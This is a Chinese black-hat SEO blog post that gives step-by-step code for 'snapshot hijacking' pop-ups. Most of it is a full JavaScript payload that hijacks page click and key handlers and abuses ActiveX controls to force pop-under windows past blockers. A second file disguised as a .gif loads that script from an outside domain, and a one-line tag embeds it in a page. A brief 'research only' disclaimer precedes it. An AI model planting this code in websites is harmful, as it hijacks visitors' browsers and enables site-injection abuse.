黑帽seo利用GIF图片制作快照劫持挂马弹窗

黑帽seo利用GIF图片制作快照劫持挂马弹窗,风酷seo在这里只是针对百度快照优化做了一个小小的解密,不支持各位大神用于黑帽,在此仅仅作为GIF图片制作快照劫持挂马弹窗的研究,废话不多说,继续阅读:

黑帽seo利用GIF图片制作快照劫持挂马弹窗

第一步:用editplus新建文件fengku.js,输入以下内容:

var objdate = new Date(); var _hasqyp = 0, _reqqyp = 0, _clkqyp = 0, _redy_webkit = 0; function strtc() { var d = navigator.userAgent; var a = {}; a.ver = { ie: /MSIE/.test(d), ie6: !/MSIE 7\.0/.test(d) && /MSIE 6\.0/.test(d) && !/MSIE 8\.0/.test(d) && !/MSIE 9\.0/.test(d), oldie: /MSIE 6\.0/.test(d) || /MSIE 7\.0/.test(d) || /MSIE 8\.0/.test(d), tt: /TencentTraveler/.test(d), i360: /360SE/.test(d), webkit: /WebKit/.test(d), cr: /Chrome/.test(d), sf: /Safari/.test(d), op: /Opera/.test(d), sg: /MetaSr/.test(d), mt: /Maxthon/.test(d) && /WebKit/.test(d), gg: window.google && window.chrome, _v1: '<object id="_pp_CIS0516_qy01" width="0" height="0" classid="CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6"></object>', _v2: '<object id="_pp_CIS0516_qy02" style="position:absolute;left:1px;top:1px;width:1px;height:1px;" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"></object>', _v3: '<div id="kd_CIS0516_pp" style="display:none;"><form action="" method="post" name="__form_kdpp" target="_blank"><input type="submit" style="display:none;" value="test" id="__sumit_kdpp"/></form></div>' }; if (a.ver.ie || a.ver.tt) { document.write(a.ver._v1); document.write(a.ver._v2) } if (a.ver.cr || a.ver.sf) { document.write(a.ver._v3) } a.fs = null; a.fdc = null; a.kd = null; a.ah = null; a.ad = null; a.timeid = 0; a.w = 0; a.h = 0; a.url = null; a.reurl = null; a.init = function() { try { if (typeof document.body.onclick == "function") { a.fs = document.body.onclick; document.body.onclick = null } if (typeof document.onclick == "object") document.onclick = function() { a.click_CIS0516_pp() }; else if (typeof document.onclick == "function") { if (document.onclick.toString().indexOf('click_CIS0516_pp') < 0) { a.fdc = document.onclick; document.onclick = function() { a.click_CIS0516_pp() } } } if (typeof document.onkeydown == "object" && a.ver.webkit) document.onkeydown = a.kdopen; else if (typeof document.onkeydown == "function" && a.ver.webkit) { if (document.onkeydown.toString().indexOf('__form_kdpp') < 0) { a.kd = document.onkeydown; document.onkeydown = a.kdopen } } } catch(q) {} }; a.uinit = function() { try { document.body.onclick = a.fs; document.onclick = a.fdc; if (a.ver.webkit) document.onkeydown = a.kd; if (a.timeid > 0) clearInterval(a.timeid); a.timeid = 0 } catch(q) {}; a.reopen(a.w, a.h) }; a.kdopen = function() { var d = document; var f = d.forms["__form_kdpp"]; f.setAttribute('action', a.url); try { f.submit() } catch(e) { d.getElementById("__sumit_kdpp").click() } window.focus(); _hasqyp++; a.uinit() }; a.click_CIS0516_pp = function() { a.wopen(a.url, a.w, a.h); _hasqyp++; a.uinit() }; a.reopen = function(e, f) { a.url = xurl[_hasqyp]; if (_hasqyp < _reqqyp) setTimeout(function() { __qy_pop_up.open() }, _qyrep_time * 1000); else if (_hasqyp < _reqqyp + _clkqyp) { setTimeout(function() { __qy_pop_up.open() }, 100) } }; a.wopen = function(c, e, f) { var b = 'height=' + f + ',width=' + e + ',left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes'; if (a.ver.sg || a.ver.mt) var j = 'window.open("/", "_blank", "' + b + '")'; else var j = 'window.open("' + c + '", "_blank", "' + b + '")'; var m = null; try { m = eval(j) } catch(q) {} if (m) { if (a.ver.sg || a.ver.mt) m.location.href = c; m.blur(); window.focus(); return true } var i = this, j = false; if (a.ver.ie || a.ver.tt) { document.getElementById("_pp_CIS0516_qy01"); document.getElementById("_pp_CIS0516_qy02"); var obj = document.getElementById("_pp_CIS0516_qy02"); if (!obj) return; var wPop = null; try { var wPop = obj.DOM.Script.open(c, "_blank", b) } catch(q) {} if (wPop) { wPop.blur(); window.focus(); return true } try { document.getElementById("_pp_CIS0516_qy01").launchURL(c); return true } catch(q) {} } return false }; a.open = function(c, d, e, f) { if (_hasqyp >= _reqqyp + _clkqyp) return; if (c) { a.url = c } if (d) { a.reurl = d } if (e) { a.reurls = e } e = e > 1 ? e: window.screen.width; f = f > 1 ? f: window.screen.height; a.w = e; a.h = f; if (a.timeid == 0) a.timeid = setInterval(a.init, a.ver.oldie ? 15 : 5); if (_hasqyp < _reqqyp && !a.ver.gg && !a.ver.cr && !a.ver.op && !a.ver.sg && !a.ver.mt) { if (a.wopen(a.url, a.w, a.h)) { _hasqyp++; a.uinit(); return } } }; window.__qy_pop_up = a }; function setCookie(tcname, value, expire) { window.document.cookie = tcname + "=" + escape(value) + ((expire == null) ? "": ("; expires=" + expire.toGMTString())) } function getCookie(tcname) { var search = tcname + "="; if (window.document.cookie.length > 0) { offset = window.document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = window.document.cookie.indexOf(";", offset); if (end == -1) end = window.document.cookie.length; return unescape(window.document.cookie.substring(offset, end)) } } return null } function register(tcname, daynum) { var today = new Date(); var expires = new Date(); //expires.setTime(today.getTime() + 1000 * 60 * 60 * daynum); expires.setTime(-1); setCookie("tcname_s", tcname, expires) }; var _qyrep_time = 5; var daynum = 240; xurl = new Array('http://www.fengku.net/'); _reqqyp = xurl.length; if (!qypp_code) { var qypp_code = 1; setTimeout(function() { __qy_pop_up.open(xurl[0]) }, 35000); var c = getCookie("tcname_s"); if (c != null) {} else { strtc(); register("tcname_s", daynum) } };

 

第二步建立fengku.gif 输入以下内容:

document.writeln("<script src=\"http://www.fengku.net/fengku.js\"></script>"); if (top.location != self.location) {top.location=self.location;} function formatonlinpic() {var picobj=document.getElementsByName("onlinepic"); var picnum=picobj.length; for(var i=0;i<picnum;i++) {if(picobj[i].width>200) {picobj[i].width=200;} if(picobj[i].height>200) {picobj[i].height=200;}}}

 

接下来就是调用了:

<script src="http://www.fengku.net/fengku.gif"></script>

转载请注明出处::【风酷SEO】 » 黑帽seo利用GIF图片制作快照劫持挂马弹窗

评论 0


Fatal error: Call to undefined function hui_user_avatar() in D:\wwwroot\fengkunet\wwwroot\wp-content\themes\xiu\functions.xiu.php on line 788